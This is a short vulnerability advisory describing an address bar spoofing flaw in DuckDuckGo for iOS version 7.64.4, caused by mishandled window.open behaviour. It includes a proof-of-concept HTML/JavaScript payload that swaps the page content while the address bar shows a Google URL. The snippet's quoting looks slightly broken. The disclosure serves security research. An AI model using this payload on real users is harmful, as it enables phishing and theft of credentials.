DuckDuckGo 7.64.4 Address Bar Spoofing

DuckDuckGo version 7.64.4 suffers from an address bar spoofing vulnerability.


MD5 | 424b48b941f4c2772ba6f7c44cb8ce00

#Vulnerability: Address Bar Spoofing Vulnerability
Product: DuckDuckGo
Discovered by: Rafay Baloch and Muhammad Samak
#Version: 7.64.4
#Impact: Moderate
#Company: Cyber Citadel
#Website: https://www.cybercitadel.com


*Description*

DuckDuckGo browser for iOS was prone to an "Address Bar Spoofing"
vulnerability due to mishandling of javaScript's window.open function
which is used to open a secondary browser window. This could be exploited
by tricking the users into supplying senstive information such as
username/passwords etc due to the fact that the address bar would display a
legitimate URL, however it would be hosted on the attacker's page.



*Proof of Concept (POC)*

Following is the POC that could be used to reproduce the issue:

<script>
function spoof(){
location="https://www.google.com/csi?random="+Math.random();
document.body.innerHTML='This is not Google!';("This is not google.com
</h1>");}
</script>
<input type="button" value="Run"
onclick="setInterval("spoof()",20);"/>



*Impact*

The issue could be abused to carry out more effective phishing attacks
against it's users.

Related Posts